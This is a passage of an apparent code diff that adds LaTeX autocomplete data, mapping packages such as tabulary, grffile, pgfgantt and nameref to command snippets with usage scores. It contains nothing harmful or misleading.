meta: 'esvect-cmd', + score: 0.003087420708479709, + }, + ], + lettrine: [ + { + caption: '\\LettrineFontHook', + snippet: '\\LettrineFontHook', + meta: 'lettrine-cmd', + score: 9.103413871235853e-5, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'lettrine-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'lettrine-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'lettrine-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\lettrine[]{}{}', + snippet: '\\lettrine[$1]{$2}{$3}', + meta: 'lettrine-cmd', + score: 0.0028028146688245602, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'lettrine-cmd', + score: 0.00037306820619479756, + }, + ], + pgfopts: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfopts-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfopts-cmd', + score: 0.021170869458413965, + }, + ], + tabulary: [ + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'tabulary-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'tabulary-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tabulary-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tabulary-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'tabulary-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + 
snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'tabulary-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'tabulary-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'tabulary-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'tabulary-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tabulary-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'tabulary-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'tabulary-cmd', + score: 0.018615449342361392, + }, + ], + grffile: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'grffile-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'grffile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'grffile-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'grffile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'grffile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'grffile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'grffile-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'grffile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'grffile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'grffile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'grffile-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'grffile-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'grffile-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'grffile-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'grffile-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'grffile-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'grffile-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'grffile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'grffile-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'grffile-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'grffile-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'grffile-cmd', + score: 0.004719094298848707, + }, + { + caption: 
'\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'grffile-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'grffile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'grffile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'grffile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'grffile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'grffile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'grffile-cmd', + score: 0.021170869458413965, + }, + ], + pgfgantt: [ + { + caption: '\\gantttitlecalendar{}', + snippet: '\\gantttitlecalendar{$1}', + meta: 'pgfgantt-cmd', + score: 0.00027821409061195467, + }, + { + caption: '\\ganttset{}', + snippet: '\\ganttset{$1}', + meta: 'pgfgantt-cmd', + score: 0.0002492292297037303, + }, + { + caption: '\\gantttitlelist[]{}{}', + snippet: '\\gantttitlelist[$1]{$2}{$3}', + meta: 'pgfgantt-cmd', + score: 0.00046430963549633653, + }, + { + caption: '\\gantttitlelist{}{}', + snippet: '\\gantttitlelist{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.00046430963549633653, + }, + { + caption: '\\ganttlink[]{}{}', + snippet: '\\ganttlink[$1]{$2}{$3}', + meta: 'pgfgantt-cmd', + score: 0.0011494045501518014, + }, + { + caption: '\\newganttchartelement{}{}', + snippet: '\\newganttchartelement{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.00023651453263545777, + }, + { + caption: '\\gantttitle{}{}', + snippet: '\\gantttitle{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.001804531670553746, + }, + { + caption: '\\gantttitle[]{}{}', + snippet: '\\gantttitle[$1]{$2}{$3}', + meta: 'pgfgantt-cmd', + score: 0.001804531670553746, + }, + { + caption: '\\setganttlinklabel{}{}', + snippet: '\\setganttlinklabel{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 9.045112044064169e-5, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfgantt-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfgantt-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgfgantt-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgfgantt-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgfgantt-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgfgantt-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfgantt-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgfgantt-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfgantt-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 
'pgfgantt-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfgantt-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfgantt-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgfgantt-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfgantt-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfgantt-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfgantt-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgfgantt-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfgantt-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfgantt-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgfgantt-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgfgantt-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgfgantt-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfgantt-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgfgantt-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfgantt-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgfgantt-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgfgantt-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgfgantt-cmd', + score: 0.2864294797053033, + }, + ], + circuitikz: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'circuitikz-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'circuitikz-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'circuitikz-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 
'circuitikz-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'circuitikz-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'circuitikz-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'circuitikz-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'circuitikz-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'circuitikz-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'circuitikz-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'circuitikz-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'circuitikz-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'circuitikz-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'circuitikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'circuitikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'circuitikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'circuitikz-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'circuitikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'circuitikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'circuitikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'circuitikz-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'circuitikz-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'circuitikz-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'circuitikz-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'circuitikz-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'circuitikz-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'circuitikz-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'circuitikz-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'circuitikz-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'circuitikz-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'circuitikz-cmd', + score: 
0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'circuitikz-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'circuitikz-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'circuitikz-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'circuitikz-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'circuitikz-cmd', + score: 0.2864294797053033, + }, + ], + hypcap: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypcap-cmd', + score: 0.008565354665444157, + }, + ], + 'scrlayer-scrpage': [ + { + caption: '\\lofoot{}', + snippet: '\\lofoot{$1}', + meta: 'scrlayer-scrpage-cmd', + score: 0.00011911213812243537, + }, + { + caption: '\\rofoot{}', + snippet: '\\rofoot{$1}', + meta: 'scrlayer-scrpage-cmd', + score: 0.00021082185485863327, + }, + { + caption: '\\clearpairofpagestyles', + snippet: '\\clearpairofpagestyles', + meta: 'scrlayer-scrpage-cmd', + score: 8.874602750594376e-5, + }, + { + caption: '\\ihead{}', + snippet: '\\ihead{$1}', + meta: 'scrlayer-scrpage-cmd', + score: 0.0004507603139230655, + }, + { + caption: '\\ihead[]{}', + snippet: '\\ihead[$1]{$2}', + meta: 'scrlayer-scrpage-cmd', + score: 0.0004507603139230655, + }, + { + caption: '\\cofoot{}', + snippet: '\\cofoot{$1}', + meta: 'scrlayer-scrpage-cmd', + score: 0.00021082185485863327, + }, + { + caption: '\\cfoot{}', + snippet: '\\cfoot{$1}', + meta: 'scrlayer-scrpage-cmd', + score: 0.013411641301057813, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'scrlayer-scrpage-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'scrlayer-scrpage-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\addtokomafont{}{}', + snippet: '\\addtokomafont{$1}{$2}', + meta: 'scrlayer-scrpage-cmd', + score: 0.0008555564394100388, + }, + { + caption: '\\setkomafont{}{}', + snippet: '\\setkomafont{$1}{$2}', + meta: 'scrlayer-scrpage-cmd', + score: 0.012985816912639263, + }, + { + caption: '\\KOMAoptions{}', + snippet: '\\KOMAoptions{$1}', + meta: 'scrlayer-scrpage-cmd', + score: 0.000396664302361659, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'scrlayer-scrpage-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\automark[]{}', + snippet: '\\automark[$1]{$2}', + meta: 'scrlayer-scrpage-cmd', + score: 0.0006703031783997437, + }, + { + caption: '\\automark{}', + snippet: '\\automark{$1}', + meta: 'scrlayer-scrpage-cmd', + score: 0.0006703031783997437, + }, + { + caption: '\\pagemark', + snippet: '\\pagemark', + meta: 'scrlayer-scrpage-cmd', + score: 0.0017520841736604843, + }, + ], + amsgen: [ + { + caption: '\\do', + snippet: '\\do', + meta: 'amsgen-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'amsgen-cmd', + score: 0.0063276692758974925, + }, + ], + tipa: [ + { + caption: '\\textipa{}', + snippet: '\\textipa{$1}', + meta: 'tipa-cmd', + score: 0.0028202799587687334, + }, + ], + appendixnumberbeamer: [ + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'appendixnumberbeamer-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\inserttotalframenumber', + snippet: '\\inserttotalframenumber', + meta: 'appendixnumberbeamer-cmd', + score: 0.0008756113669543194, + 
}, + ], + totcount: [ + { + caption: '\\totvalue{}', + snippet: '\\totvalue{$1}', + meta: 'totcount-cmd', + score: 0.000325977535138643, + }, + { + caption: '\\newtotcounter{}', + snippet: '\\newtotcounter{$1}', + meta: 'totcount-cmd', + score: 0.004398151085448998, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'totcount-cmd', + score: 0.00037306820619479756, + }, + ], + atbegshi: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'atbegshi-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'atbegshi-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'atbegshi-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'atbegshi-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'atbegshi-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'atbegshi-cmd', + score: 0.008565354665444157, + }, + ], + environ: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'environ-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'environ-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'environ-cmd', + score: 0.021170869458413965, + }, + ], + arydshln: [ + { + caption: '\\hdashline', + snippet: '\\hdashline', + meta: 'arydshln-cmd', + score: 3.1727559255976046e-5, + }, + { + caption: '\\arrayrulecolor{}', + snippet: '\\arrayrulecolor{$1}', + meta: 'arydshln-cmd', + score: 0.008538501902241319, + }, + { + caption: '\\arrayrulecolor[]{}', + snippet: '\\arrayrulecolor[$1]{$2}', + meta: 'arydshln-cmd', + score: 0.008538501902241319, + }, + { + caption: '\\hline', + snippet: '\\hline', + meta: 'arydshln-cmd', + score: 1.3209538327406387, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'arydshln-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\cline{}', + snippet: '\\cline{$1}', + meta: 'arydshln-cmd', + score: 0.07276573550543858, + }, + ], + fp: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'fp-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'fp-cmd', + score: 0.021170869458413965, + }, + ], + here: [ + { + caption: '\\listof{}{}', + snippet: '\\listof{$1}{$2}', + meta: 'here-cmd', + score: 0.0009837365348002915, + }, + { + caption: '\\floatplacement{}{}', + snippet: '\\floatplacement{$1}{$2}', + meta: 'here-cmd', + score: 0.0005815474978918903, + }, + { + caption: '\\restylefloat{}', + snippet: '\\restylefloat{$1}', + meta: 'here-cmd', + score: 0.0008866338267686714, + }, + { + caption: '\\floatstyle{}', + snippet: '\\floatstyle{$1}', + meta: 'here-cmd', + score: 0.0015470917047414941, + }, + { + caption: '\\floatname{}{}', + snippet: '\\floatname{$1}{$2}', + meta: 'here-cmd', + score: 0.0011934321931750752, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'here-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'here-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\newfloat{}{}{}', + snippet: '\\newfloat{$1}{$2}{$3}', + meta: 'here-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\newfloat', + 
snippet: '\\newfloat', + meta: 'here-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\newfloat{}', + snippet: '\\newfloat{$1}', + meta: 'here-cmd', + score: 0.0012745874472536625, + }, + ], + layout: [ + { + caption: '\\layout', + snippet: '\\layout', + meta: 'layout-cmd', + score: 0.0003951770756385293, + }, + { + caption: '\\layout{}', + snippet: '\\layout{$1}', + meta: 'layout-cmd', + score: 0.0003951770756385293, + }, + ], + multibib: [ + { + caption: '\\newcites{}{}', + snippet: '\\newcites{$1}{$2}', + meta: 'multibib-cmd', + score: 0.0024438508435048224, + }, + { + caption: '\\bibliography{}', + snippet: '\\bibliography{$1}', + meta: 'multibib-cmd', + score: 0.2659628337907604, + }, + ], + tgpagella: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgpagella-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgpagella-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgpagella-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgpagella-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgpagella-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgpagella-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgpagella-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgpagella-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tgpagella-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tgpagella-cmd', + score: 0.021170869458413965, + }, + ], + minitoc: [ + { + caption: '\\addstarredchapter{}', + snippet: '\\addstarredchapter{$1}', + meta: 'minitoc-cmd', + score: 0.0009796486230293261, + }, + { + caption: '\\minitoc', + snippet: '\\minitoc', + meta: 'minitoc-cmd', + score: 0.001626371504530358, + }, + { + caption: '\\dominitoc', + snippet: '\\dominitoc', + meta: 'minitoc-cmd', + score: 0.0006984399207241325, + }, + { + caption: '\\mtcaddchapter', + snippet: '\\mtcaddchapter', + meta: 'minitoc-cmd', + score: 9.045112044064169e-5, + }, + { + caption: '\\listoffigures', + snippet: '\\listoffigures', + meta: 'minitoc-cmd', + score: 0.03447318897846567, + }, + { + caption: '\\listoftables', + snippet: '\\listoftables', + meta: 'minitoc-cmd', + score: 0.02104656820469027, + }, + { + caption: '\\tableofcontents', + snippet: '\\tableofcontents', + meta: 'minitoc-cmd', + score: 0.13360595130994957, + }, + { + caption: '\\adjustmtc', + snippet: '\\adjustmtc', + meta: 'minitoc-cmd', + score: 0.00015075186740106945, + }, + { + caption: '\\section{}', + snippet: '\\section{$1}', + meta: 'minitoc-cmd', + score: 3.0952612541683835, + }, + ], + nameref: [ + { + caption: '\\nameref{}', + snippet: '\\nameref{$1}', + meta: 'nameref-cmd', + score: 0.009472569279662113, + }, + { + caption: '\\protect', + snippet: '\\protect', + meta: 'nameref-cmd', + score: 0.0200686676229443, + }, + { + caption: '\\ref{}', + snippet: '\\ref{$1}', + meta: 'nameref-cmd', + score: 1.4380093454211778, + }, + { + caption: '\\pageref{}', + snippet: '\\pageref{$1}', + meta: 'nameref-cmd', + score: 0.019788865471151957, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'nameref-cmd', + score: 1.897791904799601, + }, + { 
+ caption: '\\thepage', + snippet: '\\thepage', + meta: 'nameref-cmd', + score: 0.0591555998103519, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'nameref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'nameref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'nameref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'nameref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\addcontentsline{}{}{}', + snippet: '\\addcontentsline{$1}{$2}{$3}', + meta: 'nameref-cmd', + score: 0.07503475348393239, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'nameref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'nameref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'nameref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'nameref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'nameref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'nameref-cmd', + score: 0.008565354665444157, + }, + ], + ntheorem: [ + { + caption: '\\theoremclass{}', + snippet: '\\theoremclass{$1}', + meta: 'ntheorem-cmd', + score: 0.0001448542182198375, + }, 